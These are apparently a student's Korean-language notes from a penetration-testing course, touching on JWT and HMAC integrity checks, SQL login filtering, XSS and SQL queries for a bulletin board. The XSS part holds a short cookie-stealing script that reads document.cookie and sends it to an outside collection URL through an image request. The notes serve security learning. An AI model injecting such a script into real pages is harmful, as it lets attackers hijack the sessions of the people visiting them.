모의해킹 7기 4주차 - cicd
쿠키를 조작 못 하게 -> jwt 어썬ijation? jwt token hash값을 통해서 무결성 체크를 한다
암행어사의 마두패 같은 느낌
authorization
hmac
로그인 할 때 사용하는 sql 문에 종류가 다양하다 개행은 알겠는데 괄호는 뭐냐 필터링
xss
공격자가 스크립트를 삽입할 수 있는 공격 피해자의 브라우저에서 공격자가 삽입한 스크립트가 실행된다
hijack session id
let cookieData = document.cookie;
data send
const http = new XMLHttpRequest();
const url = 'https://normaltic.com/test.php';
http.open('GET', url);
Http.send();
Http.onreadystatechange = (e) => {
console.log(Http.responseText);
};
data send: like hacker
let cookieData = document.cookie;
let attackURL = "https://normaltic.com/getCred.php?cookie=";
new Image().src = attackURL + cookieData;
%3d%3d == ==으로 끝나니까 base64일 가능성이 높겠다 <- ??? 어떤 과정을 거쳐야 이렇게 나오는 거죠???
게시판 구현 -> sql 제목, 내용, 작성자, 작성일, 조회수 게시판 글 작성: insert 게시판 글 리스트 보기: select 게시판 글 내용 읽기: select 게시판 글 수정: update 게시판 글 삭제: delete
게시판 페이징: limit (index) (count) 게시글 제목, where title like %var% = grep *var*
게시글 정렬 order by [column name] [asc/desc]